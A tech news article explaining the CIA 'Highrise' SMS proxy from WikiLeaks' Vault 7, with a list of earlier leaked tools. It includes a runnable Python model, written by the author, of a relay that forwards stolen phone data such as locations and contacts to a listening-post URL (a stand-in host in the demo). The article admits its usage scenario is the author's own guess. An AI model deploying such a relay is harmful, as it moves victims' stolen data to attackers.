WikiLeaks has today published the 16th batch of its ongoing Vault 7 leak. This time, instead of revealing new malware or a hacking tool, the whistleblower organisation has unveiled how CIA operatives stealthily collect and forward stolen data from compromised smartphones.
Previously we have reported about several CIA hacking tools, malware and implants used by the agency to remotely infiltrate and steal data from the targeted systems or smartphones.
However, this time neither WikiLeaks nor the leaked CIA manual clearly explains how agency operatives were using this tool.
But, since we have been covering every CIA leak from the very first day, we have worked out a plausible scenario and illustrated below how this newly revealed tool was likely being used.
Explained: How CIA Highrise Project Works
In general, malware that has compromised a machine sends the stolen data over the Internet to an attacker-controlled server (a listening post, or LP). On smartphones, however, an implant has an alternative channel for sending stolen data back to the attackers: SMS.
But collecting stolen data via SMS brings a major problem of its own: bulk messages received from multiple targeted devices are very hard to sort and analyse, since every message lands in the same inbox with nothing but the sender's number to tell them apart.
To solve this issue, the CIA created a simple Android application, dubbed Highrise, which works as an SMS proxy between the compromised devices and the listening post server.
“There are a number of IOC tools that use SMS messages for communication and HighRise is a SMS proxy that provides greater separation between devices in the field (“targets”) and the listening post” by proxying “incoming” and “outgoing” SMS messages to an internet LP,” the leaked CIA manual reads.
What I have understood after reading the manual is that CIA operatives have to install an application called “TideCheck” on their own Android device, which is set up to receive all the stolen data via SMS from the compromised devices.
The last known version of the TideCheck app, i.e. HighRise v2.0, was developed in 2013 and works on mobile devices running Android 4.0 to 4.3, though I believe, by now, they have already developed an updated version that works on the latest Android OS.
Once installed, the app prompts for a password, which is “inshallah,” and after login, it displays three options:
- Initialize — to run the service.
- Show/Edit configuration — to configure basic settings, including the listening post server URL, which must use HTTPS.
- Send Message — lets the CIA operative manually submit optional short messages (remarks) to the listening post server.
Once initialized and configured properly, the app runs continuously in the background to monitor incoming messages from compromised devices; when one arrives, it forwards every single message to the CIA’s listening post server over a TLS-secured Internet connection.
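To make the mechanism concrete, here is a small model of an SMS-to-HTTPS proxy of the kind the manual describes. It is an added example written for this article, not code from the leaked manual or the TideCheck app, and it is in Python rather than Android Java so it can be run on any machine. Everything beyond what the manual states (the envelope field names, the device tag, the JSON wire format, the sample message bodies) is an assumption. The one constraint the manual does give, that the LP URL must be HTTPS, is enforced at initialization; the transport is injectable so the demo runs offline.

```python
import hashlib
import json
import ssl
import urllib.request
from dataclasses import dataclass
from typing import Callable, Dict, List
from urllib.parse import urlparse


@dataclass
class ProxyConfig:
    lp_url: str      # listening post URL; the manual says it must be HTTPS
    device_tag: str  # label for this proxy handset (assumed field, not from the manual)


def validate_config(cfg: ProxyConfig) -> None:
    """Enforce the manual's one stated constraint: the LP URL must be https://."""
    parsed = urlparse(cfg.lp_url)
    if parsed.scheme != "https" or not parsed.netloc:
        raise ValueError(f"listening post URL must be https://, got {cfg.lp_url!r}")


@dataclass
class Sms:
    sender: str       # originating number of the compromised device
    body: str         # SMS text as delivered
    received_at: str  # UTC timestamp (ISO 8601), stamped by the proxy


def build_envelope(cfg: ProxyConfig, sms: Sms, kind: str = "target") -> dict:
    """Wrap one SMS with the metadata the LP needs to sort traffic per target.
    Field names are assumptions; the manual does not describe HighRise's wire format."""
    return {
        "proxy": cfg.device_tag,
        "kind": kind,  # "target" data or an operator "remark"
        "source": sms.sender,
        "received_at": sms.received_at,
        "body": sms.body,
        "sha256": hashlib.sha256(sms.body.encode("utf-8")).hexdigest(),
    }


def https_post(url: str, payload: bytes) -> int:
    """Default transport: POST JSON over TLS with certificate and hostname verification."""
    ctx = ssl.create_default_context()
    req = urllib.request.Request(
        url, data=payload, method="POST", headers={"Content-Type": "application/json"}
    )
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return resp.status


Transport = Callable[[str, bytes], int]


class SmsProxy:
    """Receives SMS from many targets and forwards each one to a single internet LP."""

    def __init__(self, cfg: ProxyConfig, transport: Transport = https_post):
        validate_config(cfg)  # the 'Initialize' step fails closed on a non-HTTPS LP
        self.cfg = cfg
        self.transport = transport
        self.log: List[dict] = []  # local record of everything forwarded

    def _forward(self, env: dict) -> int:
        status = self.transport(self.cfg.lp_url, json.dumps(env).encode("utf-8"))
        self.log.append(env)
        return status

    def on_sms(self, sms: Sms) -> int:
        """Called per incoming SMS (on Android this would sit behind an SMS_RECEIVED receiver)."""
        return self._forward(build_envelope(self.cfg, sms))

    def send_remark(self, text: str, when: str) -> int:
        """The manual's 'Send Message' option: an operator note, tagged so the LP
        never confuses it with data from a target."""
        return self._forward(build_envelope(self.cfg, Sms(self.cfg.device_tag, text, when), "remark"))


def group_by_source(envelopes: List[dict]) -> Dict[str, List[str]]:
    """LP-side view: message bodies grouped by originating device, which is exactly
    the sorting problem the proxy's metadata exists to solve."""
    out: Dict[str, List[str]] = {}
    for env in envelopes:
        out.setdefault(env["source"], []).append(env["body"])
    return out


def demo() -> Dict[str, List[str]]:
    """Run the proxy offline against constructed SMS traffic from two targets."""
    sent: List[bytes] = []

    def fake_transport(url: str, payload: bytes) -> int:
        sent.append(payload)  # stand-in for the HTTPS POST; nothing leaves the host
        return 200

    cfg = ProxyConfig(lp_url="https://lp.example.invalid/collect", device_tag="proxy-01")
    proxy = SmsProxy(cfg, transport=fake_transport)
    # Constructed sample traffic, not real implant output.
    proxy.on_sms(Sms("+15550001111", "LOC 37.7749,-122.4194", "2013-06-01T10:00:00Z"))
    proxy.on_sms(Sms("+15550002222", "CONTACTS 3/12", "2013-06-01T10:00:05Z"))
    proxy.on_sms(Sms("+15550001111", "CALLLOG 2/5", "2013-06-01T10:00:09Z"))
    proxy.send_remark("handset battery low", "2013-06-01T10:01:00Z")
    assert len(sent) == 4
    return group_by_source([e for e in proxy.log if e["kind"] == "target"])


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The point of the envelope is the `source` and `kind` fields: the LP can then bucket traffic per target and keep operator remarks apart from implant output, which a raw SMS inbox cannot do. Swapping `fake_transport` for the default `https_post` sends the same JSON to a real URL, with the system CA store verifying the LP certificate.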
Previous Vault 7 CIA Leaks
Last week, WikiLeaks dumped two alleged CIA implants that allowed the agency to intercept and exfiltrate SSH credentials from targeted Windows and Linux systems using different attack vectors.
Dubbed BothanSpy, an implant for the Xshell SSH client on Microsoft Windows, and Gyrfalcon, which targets the OpenSSH client on various Linux distributions, including CentOS, Debian, RHEL (Red Hat), openSUSE and Ubuntu.
Since March, the whistleblowing group has published 16 batches of the “Vault 7” series, including this week's and last week's leaks, along with the following batches:
- OutlawCountry – An alleged CIA project that allowed it to hack and remotely spy on computers running the Linux operating systems.
- ELSA – Alleged CIA malware that tracks geo-location of targeted computers and laptops running the Microsoft Windows operating system.
- Brutal Kangaroo – A tool suite for Microsoft’s Windows used by the spying agency to target closed networks or air-gapped computers within an organisation or enterprise without requiring any direct access.
- Cherry Blossom – An agency’s framework used for monitoring the Internet activity of the targeted systems by exploiting vulnerabilities in Wi-Fi devices.
- Pandemic – A CIA’s project that allowed the agency to turn Windows file servers into covert attack machines that can silently infect other computers of interest inside a targeted network.
- Athena – An agency’s spyware framework that has been developed to take full control of the infected Windows machines remotely, and works for every version of Microsoft’s Windows operating systems, from XP to Windows 10.
- AfterMidnight and Assassin – Two CIA malware frameworks for the Windows platform that have been designed to monitor activities on the infected remote host computer and execute malicious actions.
- Archimedes – Man-in-the-middle attack tool allegedly developed by the CIA to target computers inside a Local Area Network (LAN).
- Scribbles – Software reportedly designed to embed ‘web beacons’ into confidential documents, allowing the agency to track insiders and whistleblowers.
- Grasshopper – Framework that allowed the CIA hackers to easily create their custom malware for breaking into Microsoft’s Windows OS and bypassing antivirus protection.
- Marble – Source code of a secret anti-forensic framework used by the agency to hide the actual source of its malware.
- Dark Matter – Hacking exploits designed by the spying agency to target iOS and Mac systems.
- Weeping Angel – Spying tool used by the CIA hackers to infiltrate smart TVs, transforming them into covert microphones.
- Year Zero – Alleged CIA hacking exploits for popular software and hardware.